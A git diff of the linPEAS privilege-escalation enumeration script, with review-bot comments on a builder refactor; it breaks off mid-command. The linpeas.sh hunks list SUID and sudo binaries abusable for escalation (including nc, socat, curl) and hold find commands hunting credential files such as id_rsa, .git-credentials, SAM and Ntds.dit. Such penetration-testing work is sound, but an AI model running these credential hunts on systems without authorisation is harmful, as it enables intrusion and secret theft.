a/linPEAS/builder/src/yamlGlobals.py +++ b/linPEAS/builder/src/yamlGlobals.py 
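Review bot: `os.remove(TEMPORARY_LINPEAS_BASE_PATH)` is placed inside write_linpeas, so a temporary file that only __init__ needs (it is read into self.linpeas_sh there) is deleted by an unrelated output method, is never deleted when `f.write` raises or when the caller stops before write_linpeas, and makes a second write_linpeas call fail with FileNotFoundError. Move the removal to the code that drives both builders and put it in a `finally:` so the intermediate file is cleaned up on every path, e.g. `try: ... finally: os.remove(TEMPORARY_LINPEAS_BASE_PATH)`, or at least guard this call with `contextlib.suppress(FileNotFoundError)`. The enclosing class LinpeasBuilder starts outside the hunk.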
@@ -2,7 +2,54 @@ import os import yaml CURRENT_DIR = os.path.dirname(os.path.realpath(__file__)) -LINPEAS_BASE_PATH = CURRENT_DIR + "/../linpeas_base.sh" + +LINPEAS_BASE_PARTS = CURRENT_DIR + "/../linpeas_parts" +LINPEAS_PARTS = [ + { + "name": "System Information", + "name_check": "system_information", + "file_path": LINPEAS_BASE_PARTS + "/system_information.sh" + }, + { + "name": "Container", + "name_check": "container", + "file_path": LINPEAS_BASE_PARTS + "/container.sh" + }, + { + "name": "Available Software", + "name_check": "available_software", + "file_path": LINPEAS_BASE_PARTS + "/available_software.sh" + }, + { + "name": "Processes, Crons, Timers, Services and Sockets", + "name_check": "procs_crons_timers_srvcs_sockets", + "file_path": LINPEAS_BASE_PARTS + "/procs_crons_timers_srvcs_sockets.sh" + }, + { + "name": "Network Information", + "name_check": "network_information", + "file_path": LINPEAS_BASE_PARTS + "/network_information.sh" + }, + { + "name": "Users Information", + "name_check": "users_information", + "file_path": LINPEAS_BASE_PARTS + "/users_information.sh" + }, + { + "name": "Software Information", + "name_check": "software_information", + "file_path": LINPEAS_BASE_PARTS + "/software_information.sh" + }, + { + "name": "Interesting Files", + "name_check": "interesting_files", + "file_path": LINPEAS_BASE_PARTS + "/interesting_files.sh" + } +] + + +LINPEAS_BASE_PATH = LINPEAS_BASE_PARTS + "/linpeas_base.sh" +TEMPORARY_LINPEAS_BASE_PATH = CURRENT_DIR + "/../linpeas_base.sh" FINAL_LINPEAS_PATH = CURRENT_DIR + "/../../" + "linpeas.sh" YAML_NAME = "sensitive_files.yaml" FILES_YAML = CURRENT_DIR + "/../../../build_lists/" + YAML_NAME 
@@ -18,6 +65,7 @@ assert all(f in ROOT_FOLDER for f in COMMON_FILE_FOLDERS) assert all(f in ROOT_FOLDER for f in COMMON_DIR_FOLDERS) +PEAS_CHECKS_MARKUP = YAML_LOADED["peas_checks"] PEAS_FINDS_MARKUP = YAML_LOADED["peas_finds_markup"] FIND_LINE_MARKUP = YAML_LOADED["find_line_markup"] FIND_TEMPLATE = YAML_LOADED["find_template"] diff --git a/linPEAS/linpeas.sh b/linPEAS/linpeas.sh index 56bdd0c..fc368bb 100755 --- a/linPEAS/linpeas.sh +++ b/linPEAS/linpeas.sh @@ -56,7 +56,7 @@ NOTEXPORT="" DISCOVERY="" PORTS="" QUIET="" -CHECKS="SysI,Container,Devs,AvaSof,ProCronSrvcsTmrsSocks,Net,UsrI,SofI,IntFiles" +CHECKS="system_information,container,available_software,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_files" WAIT="" PASSWORD="" NOCOLOR="" @@ -77,7 +77,7 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, ${YELLOW}-N${BLUE} Do not use colours ${YELLOW}-v${BLUE} Verbose execution ${YELLOW}-P${BLUE} Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su' - ${YELLOW}-o${BLUE} Only execute selected checks (SysI, Container, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles). Select a comma separated list. + ${YELLOW}-o${BLUE} Only execute selected checks (system_information,container,available_software,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_files). Select a comma separated list. ${YELLOW}-L${BLUE} Force linpeas execution. ${YELLOW}-M${BLUE} Force macpeas execution. ${YELLOW}-d ${BLUE} Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24 
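Review bot: Each LINPEAS_PARTS entry spells its file name by hand next to `name_check` (for example `"file_path": LINPEAS_BASE_PARTS + "/system_information.sh"`) and builds paths by string concatenation, so the two can silently drift apart; deriving the path from the check name with `os.path.join(LINPEAS_BASE_PARTS, f"{name_check}.sh")` (os is already imported at the top of the file) removes the duplication. TEMPORARY_LINPEAS_BASE_PATH also reuses the old `linpeas_base.sh` location next to the builder package, so a file left behind by a build that stopped before LinpeasBuilder removed it is indistinguishable from the source file this commit moves into linpeas_parts; a comment such as `# Intermediate file: written by LinpeasBaseBuilder, read and then removed by LinpeasBuilder` would make the lifecycle explicit. LINPEAS_BASE_PATH is defined after the LINPEAS_PARTS list even though it is the input of the same pipeline; grouping it with LINPEAS_BASE_PARTS would read more naturally.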
@@ -365,8 +365,8 @@ sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\ /xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\ /xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)" #To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|' -sidVB='/ar$|/aria2c$|/arj$|/arp$|/as$|/ash$|/atobm$|/awk$|/base32$|/base64$|/basenc$|/bash$|/bridge$|/busybox$|/byebug$|/bzip2$|/capsh$|/cat$|/chmod$|/chown$|/chroot$|/cmp$|/column$|/comm$|/composer$|/cp$|/cpio$|/cpulimit$|/csh$|/csplit$|/csvtool$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dd$|/dialog$|/diff$|/dig$|/dmsetup$|/docker$|/dosbox$|/dvips$|/ed$|/emacs$|/env$|/eqn$|/expand$|/expect$|/file$|/find$|/flock$|/fmt$|/fold$|/gawk$|/gcore$|/gdb$|/gimp$|/git$|/grep$|/gtester$|/gzip$|/hd$|/head$|/hexdump$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/jjs$|/join$|/jq$|/jrunscript$|/ksh$|/ksshell$|/latex$|/ldconfig$|/less$|/logsave$|/look$|/lua$|/lualatex$|/luatex$|/make$|/mawk$|/more$|/msgattrib$|/msgcat$|/msgconv$|/msgfilter$|/msgmerge$|/msguniq$' 
-sidVB2='/mv$|/mysql$|/nano$|/nasm$|/nawk$|/nc$|/nice$|/nl$|/nmap$|/node$|/nohup$|/octave$|/od$|/openssl$|/openvpn$|/paste$|/pdflatex$|/pdftex$|/perf$|/perl$|/pg$|/php$|/pic$|/pico$|/pr$|/pry$|/python$|/rake$|/readelf$|/restic$|/rev$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/run-parts$|/rview$|/rvim$|/scp$|/sed$|/setarch$|/shuf$|/slsh$|/socat$|/soelim$|/sort$|/sqlite3$|/ss$|/ssh-keygen$|/ssh-keyscan$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tbl$|/tclsh$|/tee$|/telnet$|/tex$|/tftp$|/tic$|/time$|/timeout$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/update-alternatives$|/uudecode$|/uuencode$|/view$|/vigr$|/vim$|/vimdiff$|/vipw$|/watch$|/wc$|/wget$|/whiptail$|/xargs$|/xelatex$|/xetex$|/xmodmap$|/xmore$|/xxd$|/xz$|/zip$|/zsh$|/zsoelim$' +sidVB='/ar$|/aria2c$|/arj$|/arp$|/as$|/ash$|/atobm$|/awk$|/base32$|/base64$|/basenc$|/bash$|/bridge$|/busybox$|/byebug$|/bzip2$|/capsh$|/cat$|/chmod$|/chown$|/chroot$|/cmp$|/column$|/comm$|/composer$|/cp$|/cpio$|/cpulimit$|/csh$|/csplit$|/csvtool$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dd$|/dialog$|/diff$|/dig$|/dmsetup$|/docker$|/dosbox$|/dvips$|/ed$|/emacs$|/env$|/eqn$|/expand$|/expect$|/file$|/find$|/flock$|/fmt$|/fold$|/gawk$|/gcore$|/gdb$|/genisoimage$|/gimp$|/git$|/grep$|/gtester$|/gzip$|/hd$|/head$|/hexdump$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/jjs$|/join$|/jq$|/jrunscript$|/ksh$|/ksshell$|/latex$|/ldconfig$|/less$|/logsave$|/look$|/lua$|/lualatex$|/luatex$|/make$|/mawk$|/more$|/msgattrib$|/msgcat$|/msgconv$|/msgfilter$|/msgmerge$' 
+sidVB2='/msguniq$|/mv$|/mysql$|/nano$|/nasm$|/nawk$|/nc$|/nice$|/nl$|/nmap$|/node$|/nohup$|/octave$|/od$|/openssl$|/openvpn$|/paste$|/pdflatex$|/pdftex$|/perf$|/perl$|/pg$|/php$|/pic$|/pico$|/pr$|/pry$|/python$|/rake$|/readelf$|/restic$|/rev$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/run-parts$|/rview$|/rvim$|/scp$|/sed$|/setarch$|/shuf$|/slsh$|/socat$|/soelim$|/sort$|/sqlite3$|/ss$|/ssh-keygen$|/ssh-keyscan$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tbl$|/tclsh$|/tee$|/telnet$|/tex$|/tftp$|/tic$|/time$|/timeout$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/update-alternatives$|/uudecode$|/uuencode$|/view$|/vigr$|/vim$|/vimdiff$|/vipw$|/watch$|/wc$|/wget$|/whiptail$|/xargs$|/xelatex$|/xetex$|/xmodmap$|/xmore$|/xxd$|/xz$|/zip$|/zsh$|/zsoelim$' cfuncs='file|free|main|more|read|split|write' sudoVB1=" \*|env_keep\+=LD_PRELOAD|ansible-playbook$|apt-get$|apt$|ar$|aria2c$|arj$|arp$|as$|ash$|at$|atobm$|awk$|base32$|base64$|basenc$|bash$|bpftrace$|bridge$|bundler$|busctl$|busybox$|byebug$|bzip2$|c89$|c99$|capsh$|cat$|certbot$|check_by_ssh$|check_cups$|check_log$|check_memory$|check_raid$|check_ssl_cert$|check_statusfile$|chmod$|chown$|chroot$|cmp$|cobc$|column$|comm$|composer$|cowsay$|cowthink$|cp$|cpan$|cpio$|cpulimit$|crash$|crontab$|csh$|csplit$|csvtool$|cupsfilter$|curl$|cut$|dash$|date$|dd$|dialog$|diff$|dig$|dmesg$|dmidecode$|dmsetup$|dnf$|docker$|dosbox$|dpkg$|dvips$|easy_install$|eb$|ed$|emacs$|env$|eqn$|ex$|exiftool$|expand$|expect$|facter$|file$|find$|flock$|fmt$|fold$|ftp$|gawk$|gcc$|gcore$|gdb$|gem$|genisoimage$|ghc$|ghci$|gimp$|git$|grep$|gtester$|gzip$|hd$|head$|hexdump$|highlight$|hping3$|iconv$|iftop$|install$|ionice$|ip$|irb$|jjs$|join$|journalctl$|jq$|jrunscript$|knife$|ksh$|ksshell$|latex$|ldconfig$|less$|ln$|loginctl$|logsave$|look$|ltrace$|lua$|lualatex$|luatex$|lwp-download$|lwp-request$|mail$|make$|man$|mawk$|more$|mount$" 
@@ -1086,144 +1086,145 @@ if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks || echo $CHECKS | grep -q IntFil CONT_THREADS=0 # FIND ALL KNOWN INTERESTING SOFTWARE FILES - FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` - FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" -o -name \"system.d\" -o -name \"bind\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` - FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` - FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` - FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" -o -name \"bind\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` - FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \"environments\" -o -name \"logstash\" -o -name \"filezilla\" -o -name \".bluemix\" -o -name \"ldap\" -o -name \"postfix\" -o -name \"seeddms*\" -o -name \"couchdb\" -o -name \"roundcube\" -o -name \".svn\" -o -name \"cacti\" -o -name \".vnc\" -o -name \".irssi\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"mysql\" -o -name \"zabbix\" -o -name \"sentry\" -o -name \"neo4j\" -o -name \"sites-enabled\" -o -name \"bind\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o 
-name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" 
-o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. 
'\\\$NC 1>&2;"` - FIND_BIN=`eval_bckgrd "find /bin -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o 
